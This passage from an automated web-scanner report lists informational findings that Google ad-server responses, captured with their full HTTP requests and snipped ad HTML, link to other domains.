User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 04:06:27 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 3738

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><iframe src="http://view.atdmt.com/NYC/iview/296638392/direct;wi.728;hi.90/01/16785806?click=http://googleads.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBtNYZw6GzTY6qGIP7lQeU9cWmCKvLuqcCs-L7zB-7tqGGUAAQARgBIL7O5Q04AFDzjufHBmDJ7oOI8KPsEroBCTcyOHg5MF9hc8gBCdoBgAFmaWxlOi8vL0M6L2Nkbi8yMDExLzA0LzIzL2RvcmsvbmV4dGFkdmlzb3Jjb20vcmVmbGVjdGVkLXhzcy1kaXJlY3RvcnktdHJhdmVyc2FsLWZpbGUtaW5jbHVzaW9uLWRvcmstZ2hkYi1leGFtcGxlLXBvYy1yZXBvcnQuaHRtbJgC-gG4AhjAAgbIApP7mR-oAwHoA94I6AObCegDSugDB_UDAAAAxA%26num%3D1%26sig%3DAGiWqtxBaAtY7CO2SXb4YF_mELC9htuaRg%26client%3Dca-pub-4063878933780912%26adurl%3D" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="728" height="90"> <script language="JavaScript" type="text/javascript">
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/2011/04/23/dork/nextadvisorcom/reflected-xss-directory-traversal-file-inclusion-dork-ghdb-example-poc-report.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dstories.citi.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNFOFsK7SWWx0utRL8bQCc3u-5ceUg" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

23.379. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303681462&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303663462279&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303663462290&frm=1&adk=2614322350&ga_vid=893085860.1303663462&ga_sid=1303663462&ga_hid=2122288689&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=13 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:44:19 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 2164

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script type="text/javascript" src="http://ad.turn.com/server/ads.js?pub=5622371&cch=5689307&code=5689677&l=160x600&aid=25919894&ahcid=1089763&bimpd=739JIzvALy56eDDqJQS39FR8J9WhYwrxnROzWwCChnM9XoWQAkLU_2ggLq50jQG2LGgelz04ch13nml8chQ9uK9niBJoz6621irB3f190hXQBbsq7GRkM0K-RGUzu2oktl1sL4zS-2XTqCiC_CemeNW-SvPVZ9uvWN6QKCcGWsGWw_XUAnRIc08sAhMi6jaM3UfbSMqNBzxuuOzvFqY6BCYYVaq6NvAn4T5JhFfjdzo9r9qSXhVfD-RlEq2Lb7tPlgHBzIj8H9loLjUdnhyPRc4RN-inI8pEqAxH2vizLBnrnjs0ppxGD7r18ENzxp2MffKaMqsZ1enCHl2qau2b7kvy-fr5_dAE21DMbixvFmdO5Ic1Tm7zMwsmC67vFMlBtC8cnfVoc-ffY0bjr9ypPge7R7oyaDl40Wj8djiGyN5ei3VHa01VsmgGuwFyNi4D1jqGYNVEoTZiB8PgDyUCTlavce-0U6tnxWFnMP5mj9WhneTrBKJPgkiiXrA82MwmMmAKf-fTCPDGWd8sW3YPetZOHC1kzE7ePsUwQvuAGkx5nm0lTjSklndxOrj4-IjIy9HCzfG1V190a4drUYjlO73wc-cQ7FRKnITKYzO3zYV0Lx85IfstsDOG1d7FMwKtoByWRKoQ3oF0AT_2N-Em_vTLcUD7lSWQB1A1_8OQ2ozt_T370WDWWY1SqEwEJwbhXPDssQGIF1ab8xpzk0MIKO0jwsuV5-UswDl8uj67vk85SgEEswKh1LTzH1WJY68rH5O2l4omHA8aqpEYcTYQNao408BxR9uazB8jKSDnLvk&acp=TbRTYwAFqPUK7F3E0PZOG9h8rZtVuJUm3zJKqQ&3c=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBXfM-Y1O0TfXRFsS7sQebnNmHDcCshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgCZMACBMgC7JPpCagDAegDvAHoA5QC9QMAAADEgAbl8ongssKXiaIB%26num%3D1%26sig%3DAGiWqtyXQUZBWUf8zmRZwI-2CksJq62GXg%26client%3Dca-pub-6888065668292638%26adurl%3D"></script>
...[SNIP]...

23.380. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679548&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661548523&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303661548527&frm=1&adk=2614322350&ga_vid=823470484.1303661549&ga_sid=1303661549&ga_hid=2093907365&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&eid=33895132&fu=4&ifi=1&dtd=7 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:12:25 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 14730

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</a>&nbsp;<img alt="" class=cbg height=10 src="http://pagead2.googlesyndication.com/pagead/badge/checkout_999999.gif" title="This site accepts Google Checkout" width=19><div class=adb>
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.Amazon.com%26adT%3DArnazon.com%25C2%25AE%2B-%2BShop%26adU%3DPeru.travel%26adT%3DAmazonia%2BMuseums%26adU%3Dwww.webgility.com%26adT%3DAmazon%2B-sync-%2BQuickBooks%26adU%3Dwww.GoECart.com/Sell_More%26adT%3DEasier%2BAmazon%2BStore%2BMgmt.%26adU%3DNasuni.com/Cloud_Providers%26adT%3DConnect%2Bw/Cloud%2BProviders%26gl%3DUS&amp;usg=AFQjCNH2pPPW7oD6HmNZSR15SVJcuam_TQ" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.381. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676624&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658624768&shv=r20110420&jsv=r20110415&saldr=1&correlator=1303658624770&frm=1&adk=2614322350&ga_vid=2012220246.1303658625&ga_sid=1303658625&ga_hid=284855663&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&eid=33895130&fu=4&ifi=1&dtd=5 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://pub.retailer-amazon.net/banner_120_600_b.php?search={$keyword}
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 15:23:41 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1371

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><iframe width="160" height="600" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="http://cdn.w55c.net/i/0R9ulNflD0_1008589149.html?rtbhost=rts-rr13.sldc.dataxu.net&btid=NERCNDQwN0QwMDBCRTk3ODBBRTU3MThFMjhCQzU4NkN8R0ZtQ2VPMHVRdnwxMzAzNjU4NjIzODE4fDF8MEZhWXZLM3ZQaHwwUjl1bE5mbEQwfEVYXzEwMjM0NzcyMDZ8MTgyNTk4&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAfQAL6XgK5XGOKLxYbPmt5BBxSOnJCdA1hw&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZhWXZLM3ZQaA&ciu=MFI5dWxOZmxEMA&reqid=NERCNDQwN0QwMDBCRTk3ODBBRTU3MThFMjhCQzU4NkM&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=182&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php&"> </iframe>
...[SNIP]...

23.382. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679668&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661668578&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303661668584&frm=1&adk=2614322350&ga_vid=1392256269.1303661669&ga_sid=1303661669&ga_hid=1543420627&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=10 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:14:25 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 2163

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script type="text/javascript" src="http://ad.turn.com/server/ads.js?pub=5622371&cch=5689307&code=5689677&l=160x600&aid=25474489&ahcid=640462&bimpd=rGlAMYkRYgBRpI3DsEuPf0p5a05qIN5ID27vxZrUyIIAVSEwwAku2_b46UOv89GJdtysiIP26yS7s8I3pAc0T69niBJoz6621irB3f190hXQBbsq7GRkM0K-RGUzu2oktl1sL4zS-2XTqCiC_CemeNW-SvPVZ9uvWN6QKCcGWsGWw_XUAnRIc08sAhMi6jaM3UfbSMqNBzxuuOzvFqY6BH3iX1ZfkEPugt72CmK04CyGDOWIWwtpfKu6Yb9nPGUMhtlfbsVT-wOwKJBNR3jwWTazV0AvbMQZNLntaOeKl1p3e0zVN6loNyK4c_OoCgom8jpD4tX7Nxwn2-BtKmkq7LmKEOeK4ZAoWfwI8SCWgb1j-Ezh3q9PALHUe6oayQIztC8cnfVoc-ffY0bjr9ypPr7vVxLo4SQGNqr6znxbeBigsLTxdpnye91zCQ7JsBxbrg3DoDCmL2ffRtSVuJNqJgaJQmyFM1l4x-S8oOkTR0VUULXw7tpNDsCXeX5kiU7IMmAKf-fTCPDGWd8sW3YPeuZcgF_uJfsdRlJrg2l5qBJ5nm0lTjSklndxOrj4-IjIX91mNtx9s8FQapZIbkQ1tNBrIEGL6Qi9P13I5nx5nfqhdNCAXgSonD4Wtmpte-DfH3NngsQiO9YMiN-l9OgnK6Lhd38O4b4WbBWengTve4vt_T370WDWWY1SqEwEJwbhoHTLamDrAmQq2DYIVNCf6VQGYjf1QW3f3F61FH8ZW8ZA9y0FUzpqtDC0K6uSmpOa-_o7WETpsTIqibm6vBqblKo408BxR9uazB8jKSDnLvk&acp=TbRMYQAJruAK5XuOMNsX5PLWU3C0EJg3YP6boA&3c=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBUe3MYUy0TeDdJo73lQfkr-yGA8CshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgCZMACBMgC7JPpCagDAegDvAHoA5QC9QMAAADEgAbClYHu9567sukB%26num%3D1%26sig%3DAGiWqtxTMQzv5gNUN0_08G60ytFBJ7xwdw%26client%3Dca-pub-6888065668292638%26adurl%3D"></script>
...[SNIP]...

23.383. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303680254&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F24%2Fdork%2Freflected-xss-cross-site-scripting-ghdb-cwe-79-capec-86-lifelockcom.html&dt=1303662301390&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303662301402&frm=0&adk=1607234649&ga_vid=1039032232.1303662301&ga_sid=1303662301&ga_hid=992989858&ga_fc=0&u_tz=-300&u_his=14&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&fu=0&ifi=1&dtd=24&xpc=qT8zFST1DI&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:24:58 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12624

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/24/dork/reflected-xss-cross-site-scripting-ghdb-cwe-79-capec-86-lifelockcom.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.Cadillac.com/Escalade%26adT%3DMB%2BGL450%2Bvs%2BEscalade%26adU%3Dvulnerability.scan.qualys.com%26adT%3DFree%2BOnline%2BNetwork%2BScan%26adU%3Dgo.SunGardAS.com%26adT%3DColocation%2BSolutions%26gl%3DUS&amp;usg=AFQjCNESfDuuwDPIFtCRDdmOMYOvvKpWHg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.384. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303681723&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303663723234&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303663723240&frm=1&adk=2614322350&ga_vid=1510993358.1303663723&ga_sid=1303663723&ga_hid=462246023&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&eid=36813005&fu=4&ifi=1&dtd=8 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:48:40 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 14963

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.Dell.com/Blades%26adT%3DSecure%2BServer%26adU%3Dwww.NetApp.com%26adT%3DNetApp%25C2%25AE%2BIT%2BCalculator%26adU%3Dwww.Microsoft.com/Cloud%26adT%3DWhat%2Bis%2BCloud%2BComputing%253F%26adU%3Dwww.coolcapitals.com%26adT%3DRestaurants%2BIn%2BAntwerp%26adU%3Dwww.SugarHouseBanners.com%26adT%3DBanner%2BStands%2B%2526amp%253B%2BDisplays%26gl%3DUS&amp;usg=AFQjCNEbuoSvVVJEMJPJceqO5vjg6863Qg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.385. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676602&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658602580&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658602586&frm=1&adk=2614322350&ga_vid=1898243012.1303658603&ga_sid=1303658603&ga_hid=226900712&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=9 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 15:23:19 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 2163

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
